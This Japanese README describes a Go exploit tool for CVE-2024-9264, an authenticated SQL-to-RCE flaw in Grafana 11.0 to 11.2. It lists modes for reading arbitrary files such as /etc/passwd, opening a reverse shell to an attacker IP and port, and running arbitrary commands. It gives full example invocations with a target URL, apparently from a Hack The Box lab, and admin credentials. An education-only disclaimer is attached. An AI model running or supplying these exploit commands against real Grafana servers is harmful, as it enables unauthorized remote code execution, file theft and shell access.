
Grafana バージョン 11.0.x、11.1.x、および 11.2.x に影響を与える CVE-2024-9264 の Go 実装
CVE-2024-9264 のエクスプロイトツール。Grafanaの重大な脆弱性で、認証された攻撃者がSQLクエリを実行し、RCEに至る可能性があります。
🛡️ このツールは厳格に教育目的および許可されたペネトレーションテストのために使用されます。
許可されていない使用は違法かつ非倫理的です。
CVE-2024-9264 はGrafanaにおける重大な欠陥で、認証された攻撃者がSQLコマンドを実行し、RCEやファイル読み取りを引き起こすことを許します。
file – 任意のファイルの読み取り(例: /etc/passwd)shell – 攻撃者マシンへのリバースシェルcommand – 任意のシェルコマンドの実行(例: whoami)
すべての引数が必要なわけではありません。
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]